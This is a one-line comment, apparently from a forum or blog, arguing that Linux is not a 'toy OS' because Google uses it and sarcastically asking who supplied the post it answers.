Linux isn't a Toy OS. it's used by google. Who provided you this Informative post :)